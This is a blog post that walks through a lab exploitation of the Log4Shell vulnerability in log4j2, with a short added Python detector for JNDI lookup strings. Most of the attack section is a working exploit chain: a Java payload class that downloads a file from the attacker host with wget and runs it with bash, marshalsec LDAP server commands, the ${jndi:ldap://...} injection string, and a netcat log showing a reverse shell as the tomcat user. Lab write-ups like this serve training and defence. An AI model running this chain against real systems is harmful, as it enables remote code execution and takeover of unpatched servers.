Post

Lab – Exploiting Log4Shell (CVE-2021-44228)

Background

On December 10th, 2021, the Log4Shell vulnerability, a “0-day” in log4j2, appeared on Twitter. In this post, we will explore how to exploit it via LDAP in a lab environment. To be exploitable, you need user input that gets logged, log4j2 versions 2.0 to 2.14.1, and the settings com.sun.jndi.rmi.object.trustURLCodebase & com.sun.jndi.cosnaming.object.trustURLCodebase set to true (which is not the default for Java runtimes >= 8u121).

To my understanding, any Java version will allow the DNS lookup (given the points noted above are true), but not necessarily the RCE via LDAP. In this example, we will exploit it against Java 8u211.

You can find additional information here:

Exploitation

  • Attacker: 10.8.0.2
  • Victim: 10.10.10.7

Create the payload java class:

public class RCE {
    // Static initializer: runs as soon as the victim's JVM loads the class fetched via the LDAP reference
    static {
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec("wget http://10.8.0.2/x -O /tmp/x");
            p.waitFor();
            r = Runtime.getRuntime();
            p = r.exec("/bin/bash /tmp/x");
            p.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    public RCE(){
        System.out.println("Is this RCE?");
    }
}

Compile the class with the same Java version the target uses (this can involve some guesswork, but if debugging is enabled the target will complain about mismatching versions):

javac RCE.java

Download, compile & start the server:

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.8.0.2:8888/#RCE"

Start a webserver that hosts the final payload & one that hosts the class file:

python3 -m http.server 80
python3 -m http.server 8888

Finally, send the payload to the target:

${jndi:ldap://10.8.0.2:1389/a}

If everything went well, your webserver will see a download of “x”, which is then executed with bash on the target.

Send LDAP reference result for a redirecting to http://10.8.0.2:8888/RCE.class
...
10.10.10.7 - - [11/Dec/2021 16:49:33] "GET /RCE.class HTTP/1.1" 200 -
...
10.10.10.7 - - [11/Dec/2021 16:49:33] "GET /x HTTP/1.1" 200 -
...
nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.8.0.2] from (UNKNOWN) [10.10.10.7] 38670
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
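The same exchange leaves traces on the defending side: the lookup string in whatever got logged, and a log4j-core jar in the affected version range. The following Python script is an added example, not part of the original post; it flags JNDI lookups (the ldap form used above plus the rmi and dns forms the post mentions) in constructed sample log lines and checks a version string against the 2.0 to 2.14.1 range stated in the background section.

```python
import re
from typing import Dict, List, Optional, Tuple

# JNDI lookup in the form used by the post's payload (${jndi:ldap://10.8.0.2:1389/a}),
# for the ldap, ldaps, rmi and dns schemes, matched case-insensitively.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns)://(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)
# Affected log4j2 range as stated in the post: 2.0 up to and including 2.14.1.
AFFECTED_MIN, AFFECTED_MAX = (2, 0, 0), (2, 14, 1)

def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Pull a major.minor[.patch] triple out of a version string or jar name."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))

def is_affected_version(text: str) -> bool:
    """True when the parsed version falls inside the affected range."""
    v = parse_version(text)
    return v is not None and AFFECTED_MIN <= v <= AFFECTED_MAX

def find_jndi_lookups(lines: List[str]) -> List[Dict[str, str]]:
    """One record per JNDI lookup found: line number, callback scheme, host and port."""
    hits = []
    for number, line in enumerate(lines, 1):
        for m in JNDI_RE.finditer(line):
            hits.append({"line": str(number), "scheme": m.group("scheme").lower(),
                         "host": m.group("host"), "port": m.group("port") or ""})
    return hits

# Constructed sample lines: an access-log entry carrying the post's payload, two application
# log lines with the RMI and DNS variants the post mentions, and a benign entry.
SAMPLE_LOG = [
    '10.10.10.7 - - [11/Dec/2021:16:49:33 +0000] "GET /?q=${jndi:ldap://10.8.0.2:1389/a} HTTP/1.1" 200 -',
    'WARN  [http-nio-8080-exec-3] LoginController - failed login for user ${JNDI:RMI://10.8.0.2:1099/a}',
    'WARN  [http-nio-8080-exec-4] LoginController - failed login for user ${jndi:dns://10.8.0.2/x}',
    '10.10.10.7 - - [11/Dec/2021:16:49:34 +0000] "GET /index.html HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(hit)
    print("log4j-core-2.14.1.jar affected:", is_affected_version("log4j-core-2.14.1.jar"))
```

The extracted host and port are what you would feed into an egress block or an alert; the version check is a first pass only, since a patched jar can still be shipped under a vulnerable name inside a fat jar.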

Alternatively, you can use this JNDI server, which supports LDAP & RMI:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C <command> -A <address> 

If you want to practice in this lab environment, vulnlab is currently open for beta access to patreon subscribers!

This post is licensed under CC BY 4.0 by the author.